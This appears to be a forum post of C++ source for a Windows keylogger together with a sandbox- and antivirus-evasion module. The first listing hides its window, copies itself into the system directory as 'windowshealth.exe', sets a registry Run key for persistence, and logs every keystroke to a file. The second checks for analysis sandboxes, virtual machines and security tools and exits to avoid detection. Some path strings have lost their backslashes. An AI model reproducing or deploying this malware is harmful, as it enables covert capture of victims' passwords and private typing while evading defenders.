Code:
#include <iostream>
#include <cstdlib>
#include <Windows.h>
#include <emu.h>
using namespace std;
char lpSystemDir[MAX_PATH];
char lpSystemFile[MAX_PATH];
char lpSystemLog[MAX_PATH];
BOOL IsLog();
BOOL IsCopyFile();
BOOL IsAutostart();
BOOL IsDummy();
void hidewindow();
int main()
{
hidewindow();
if(IsAll() == 1)
{
return 1;
}
IsDummy();
IsAutostart();
IsLog();
return 0;
}
void hidewindow()
{
FreeConsole();
AllocConsole();
ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0);
}
BOOL IsDummy()
{
int number1 = 55;
int number2 = 30;
char str[10] = "blub";
string str2 = "hello";
printf("%s",str);
cout << str2 << endl;
return number1 * number2;
}
BOOL IsCopyFile()
{
char ownpath[MAX_PATH];
GetModuleFileName(0,ownpath,sizeof(ownpath));
if(CopyFile(ownpath, lpSystemFile, FALSE) == 0)
{
return 0;;
}
return 1;
}
BOOL IsAutostart()
{
GetSystemDirectory(lpSystemDir, sizeof(lpSystemDir));
strcpy(lpSystemFile,lpSystemDir);
strcat(lpSystemFile,"\windowshealth.exe");
if(IsCopyFile() == 1)
{
HKEY key;
if(RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",&key) == 0)
{
RegSetValueEx((HKEY)key,"windowshealth",0,REG_SZ,(BYTE *)lpSystemFile,strlen(lpSystemFile));
return 1;
}
}
return 0;
}
BOOL IsLog()
{
short comp;
while(1)
{
Sleep(15);
for(comp =8 ; comp <= 222; comp++)
{
if(GetAsyncKeyState(comp) == -32767)
{
strcpy(lpSystemLog,lpSystemDir);
strcat(lpSystemLog,"\windowshealth.log");
FILE *file;
file=fopen(lpSystemLog,"a+");
if(file != NULL)
{
if( (comp >= 39) && (comp <= 64) )
{
fputc(comp,file);
fclose(file);
break;
}
else if( (comp > 64) && (comp < 91) )
{
comp+=32;
fputc(comp,file);
fclose(file);
break;
}
else
{
switch(comp)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_RETURN:
fputs("n",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_CLEAR:
fputs("[CLEAR]",file);
fclose(file);
break;
case VK_MENU:
fputs("[ALT]",file);
fclose(file);
break;
case VK_PAUSE:
fputs("[PAUSE]",file);
fclose(file);
break;
case VK_ESCAPE:
fputs("[ESC]",file);
fclose(file);
break;
case VK_NEXT:
fputs("[PAGEDOWN]",file);
fclose(file);
break;
case VK_END:
fputs("[END]",file);
fclose(file);
break;
case VK_HOME:
fputs("[HOME]",file);
fclose(file);
break;
case VK_LEFT:
fputs("[align=left]",file);
fclose(file);
break;
case VK_UP:
fputs("[UP]",file);
fclose(file);
break;
case VK_RIGHT:
fputs("[align=right]",file);
fclose(file);
break;
case VK_DOWN:
fputs("[DOWN]",file);
fclose(file);
break;
case VK_SELECT:
fputs("[SELECT]",file);
fclose(file);
break;
case VK_PRINT:
fputs("[PRINT]",file);
fclose(file);
break;
case VK_EXECUTE:
fputs("[EXECUTE]",file);
fclose(file);
break;
case VK_SNAPSHOT:
fputs("[SNAPSHOT]",file);
fclose(file);
break;
case VK_INSERT:
fputs("[INSERT]",file);
fclose(file);
break;
case VK_HELP:
fputs("[HELP]",file);
fclose(file);
break;
case VK_LWIN:
fputs("[LWIN]",file);
fclose(file);
break;
case VK_RWIN:
fputs("[RWIN]",file);
fclose(file);
break;
case VK_APPS:
fputs("[APPS]",file);
fclose(file);
break;
case VK_SLEEP:
fputs("[SLEEP]",file);
fclose(file);
break;
case 0x6C:
fputs("[SEPERATOR]",file);
fclose(file);
break;
case VK_SUBTRACT:
fputs("[SUBTRACT]",file);
fclose(file);
break;
case VK_MULTIPLY:
fputs("*",file);
fclose(file);
break;
case VK_ADD:
fputs("[ADD]",file);
fclose(file);
break;
case VK_DECIMAL:
fputs("[DECIMAL]",file);
fclose(file);
break;
case VK_DIVIDE:
fputs("/",file);
fclose(file);
break;
case VK_NUMLOCK:
fputs("[NUMLOCK]",file);
fclose(file);
break;
case VK_SCROLL:
fputs("[SCROLLLOCK]",file);
fclose(file);
break;
case VK_F1:
fputs("[F1]",file);
fclose(file);
break;
case VK_F2:
fputs("[F2]",file);
fclose(file);
break;
case VK_F3:
fputs("[F4]",file);
fclose(file);
break;
case VK_F4:
fputs("[F4]",file);
fclose(file);
break;
case VK_F5:
fputs("[F5]",file);
fclose(file);
break;
case VK_F6:
fputs("[F6]",file);
fclose(file);
break;
case VK_F7:
fputs("[F7]",file);
fclose(file);
break;
case VK_F8:
fputs("[F8]",file);
fclose(file);
break;
case VK_F9:
fputs("[F9]",file);
fclose(file);
break;
case VK_F10:
fputs("[F10]",file);
fclose(file);
break;
case VK_F11:
fputs("[F11]",file);
fclose(file);
break;
case VK_F12:
fputs("[F12]",file);
fclose(file);
break;
case VK_F13:
fputs("[F13]",file);
fclose(file);
break;
case VK_F14:
fputs("[F14]",file);
fclose(file);
break;
case VK_F15:
fputs("[F15]",file);
fclose(file);
break;
case VK_F16:
fputs("[F16]",file);
fclose(file);
break;
case VK_F17:
fputs("[F17]",file);
fclose(file);
break;
case VK_F18:
fputs("[F18]",file);
fclose(file);
break;
case VK_F19:
fputs("[F18]",file);
fclose(file);
break;
case VK_F20:
fputs("[F20]",file);
fclose(file);
break;
case VK_F21:
fputs("[F21]",file);
fclose(file);
break;
case VK_F22:
fputs("[F22]",file);
fclose(file);
break;
case VK_F23:
fputs("[F23]",file);
fclose(file);
break;
case VK_F24:
fputs("[F24]",file);
fclose(file);
break;
case VK_LSHIFT:
fputs("[LSHIFT]",file);
fclose(file);
break;
case VK_RSHIFT:
fputs("[RSHIFT]",file);
fclose(file);
break;
case VK_LCONTROL:
fputs("[LCONTROL]",file);
fclose(file);
break;
case VK_RCONTROL:
fputs("[RCONTROL]",file);
fclose(file);
break;
case VK_LMENU:
fputs("[LMENU]",file);
fclose(file);
break;
case VK_RMENU:
fputs("[RMENU]",file);
fclose(file);
break;
case 0xAD:
fputs("[VOLUMEMUTE]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[ ;-: ]",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[ /-? ]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`-~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [-{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[ \-| ]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]-} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("[ '-" ]",file);
fclose(file);
break;
case 0xE2:
fputs("[ BRACKET-\ ]",file);
fclose(file);
break;
case VK_PLAY:
fputs("[PLAY]",file);
fclose(file);
break;
case VK_ZOOM:
fputs("[ZOOM]",file);
fclose(file);
break;
case 0xBB:
fputs("+",file);
fclose(file);
break;
case 0xBC:
fputs(",",file);
fclose(file);
break;
case 0xBD:
fputs("-",file);
fclose(file);
break;
case 0xBE:
fputs(".",file);
fclose(file);
break;
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPSLOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}
}
return 1;
}
Code:
#include <string>
#include <tlhelp32.h>
#include <TCHAR.H>
#include <dir.h>
using namespace std;
int detected = 0;
DWORD GetModulePath(HINSTANCE hInst,LPTSTR pszBuffer,DWORD dwSize)
{
DWORD dwLength = GetModuleFileName(hInst,pszBuffer,dwSize);
if(dwLength)
{
while(dwLength && pszBuffer[ dwLength ] != _T('\'))
{
dwLength--;
}
if(dwLength)
{
pszBuffer[ dwLength + 1 ] = _T('�00');
}
}
return dwLength;
}
BOOL IsProcessRunning(const string szExeName)
{
PROCESSENTRY32 pce = {sizeof(PROCESSENTRY32)};
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
if(Process32First(hSnapshot, &pce))
{
do
{
if(!strcmp((const char*)pce.szExeFile, (const char*)szExeName.c_str()))
{
return 1;
}
}while( Process32Next(hSnapshot, &pce) );
}
return 0;
}
BOOL IsUsername(const string comp)
{
char username[30];
DWORD nSize;
nSize = sizeof(username);
GetUserName(username, &nSize);
if(strcmp(username,comp.c_str()) == 0)
{
return 1;
}
return 0;
}
BOOL IsFileInFolder(const char* filefold)
{
char buff[255];
GetModuleFileName(0,buff,255);
if (strstr(buff, filefold))
{
return 1;
}
return 0;
}
BOOL IsFolderExist(const string comp)
{
if(chdir(comp.c_str()) == 0)
{
return 1;
}
return 0;
}
BOOL IsFileNameEqualThis(const string comp)
{
char buff[255];
GetModuleFileName(0,buff,255);
if(strcmp(buff,comp.c_str()) == 0)
{
detected++;
return 1;
}
return 0;
}
BOOL IsFileExist(const string comp)
{
FILE *fp = NULL,*fp2 = NULL;
fp = fopen(comp.c_str(),"r");
if(fp != NULL)
{
return 1;
}
return 0;
}
BOOL IsAnubis()
{
if (IsFileInFolder("C:\InsideTm\") == 1)
{
detected = 1;
return 1;
}
else if(IsFileNameEqualThis("C:\sample.exe"))
{
detected = 1;
return 1;
}
else if(IsUsername("user") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsTE()
{
if(IsUsername("UserName") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsSandbox()
{
if(IsUsername("USER") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsJB()
{
if(IsProcessRunning("joeboxserver.exe") == 1 || IsProcessRunning("joeboxcontrol.exe") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsNorman()
{
if(IsUsername("currentuser") == 1 || IsUsername("CurrentUser") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsWireShark()
{
if(IsProcessRunning("wireshark.exe") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsKaspersky()
{
if(IsProcessRunning("avp.exe") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsID()
{
if(GetModuleHandle("api_log.dll") || GetModuleHandle("dir_watch.dll"))
{
detected = 1;
return 1;
}
else if(IsProcessRunning("sniff_hit.exe") == 1 || IsProcessRunning("sysAnalyzer.exe") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsSunbelt()
{
if(GetModuleHandle("pstorec.dll"))
{
detected = 1;
return 1;
}
else if(IsFolderExist("C:\analysis") == 1)
{
detected = 1;
return 1;
}
else if(IsFileExist("C:\analysis\SandboxStarter.exe") == 1) //sometimes the IsFolderExist fail
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsSandboxie()
{
if(GetModuleHandle("SbieDll.dll"))
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsVPC() //steve10120
{
HMODULE dll = LoadLibrary("C:\vmcheck.dll");
if(dll == NULL)
{
return 0;
}
BOOL (WINAPI *fnIsRunningInsideVirtualMachine)() = (BOOL (WINAPI *)()) GetProcAddress(dll, "IsRunningInsideVirtualMachine");
BOOL retValue = FALSE;
if(fnIsRunningInsideVirtualMachine != NULL)
{
retValue = fnIsRunningInsideVirtualMachine();
FreeLibrary(dll);
detected = 1;
return 1;
}
FreeLibrary(dll);
return 0;
}
BOOL IsOther() //carb0n
{
unsigned char bBuffer;
unsigned long aCreateProcess = (unsigned long)GetProcAddress( GetModuleHandle( "KERNEL32.dll" ), "CreateProcessA" );
ReadProcessMemory( GetCurrentProcess( ), (void *) aCreateProcess, &bBuffer, 1, 0 );
if( bBuffer == 0xE9 )
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsEmu() //Noble & ChainCoder
{
DWORD countit, countit2;
countit = GetTickCount();
Sleep(500);
countit2 = GetTickCount();
if ((countit2 - countit) < 500)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsVB()
{
if(IsProcessRunning("VBoxService.exe") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL IsWPE()
{
if(GetModuleHandle("WpeSpy.dll"))
{
detected = 1;
return 1;
}
else if(IsProcessRunning("WPE PRO.exe") == 1)
{
detected = 1;
return 1;
}
return 0;
}
BOOL malware()
{
//some malware code
cout << "MALWARE" << endl;
return 0;
}
BOOL IsAll()
{
if(IsAnubis() == 1)
{
}
else if(IsTE() == 1)
{
}
else if(IsSandbox() == 1)
{
}
else if(IsJB() == 1)
{
}
else if(IsNorman() == 1)
{
}
else if(IsWireShark() == 1)
{
}
else if(IsKaspersky() == 1)
{
}
else if(IsID() == 1)
{
}
else if(IsSunbelt() == 1)
{
}
else if(IsSandboxie() == 1)
{
}
else if(IsVPC() == 1)
{
}
else if(IsVB() == 1)
{
}
else if(IsWPE() == 1)
{
}
else if(IsOther() == 1 || IsEmu() == 1)
{
}
if(detected != 0)
{
return 1;
}
return 0;
}
